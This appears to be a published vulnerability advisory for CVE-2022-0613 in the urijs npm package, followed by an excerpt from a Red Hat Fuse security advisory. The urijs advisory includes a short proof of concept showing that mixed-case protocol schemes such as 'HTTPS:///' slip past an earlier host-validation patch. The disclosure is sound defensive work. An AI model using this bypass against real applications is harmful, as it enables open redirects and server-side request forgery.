Headline
CVE-2022-0613: Authorization Bypass Through User-Controlled Key in uri.js
Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8.
Description
Bypass for https://huntr.dev/bounties/1625558772840-medialize/URI.js/
urijs fixed the issue for CVE-2021-3647, however an attacker can still exploit the issue due to case-sensitive checks in the earlier patch. Attacker can use case-insensitive protocol schemes like HTTP, htTP, HTtp etc. in order to bypass the patch for that bug.
Proof of Concept
var URI = require('urijs');
var url = new URI("HTTPS:///github.com/abc");
console.log(url);
OUTPUT:
URI {
_string: '',
_parts: {
protocol: 'HTTPS',
username: null,
password: null,
hostname: null,
urn: null,
port: null,
path: '/github.com/abc',
query: null,
fragment: null,
preventInvalidHostname: false,
duplicateQueryParameters: false,
escapeQuerySpace: true
},
_deferred_build: true
}
Impact
Bypass host-validation checks, open redirect, SSRF etc. - depends on the usage of urijs
Occurrences
Related news
Red Hat Security Advisory 2022-8652-01 - This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.
A minor version update (from 7.11 to 7.11.1) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2019-8331: bootstrap: XSS in the tooltip or popover data-template attribute * CVE-2021-3717: wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users * CVE-2021-31684: json-smart: Denial of Service in...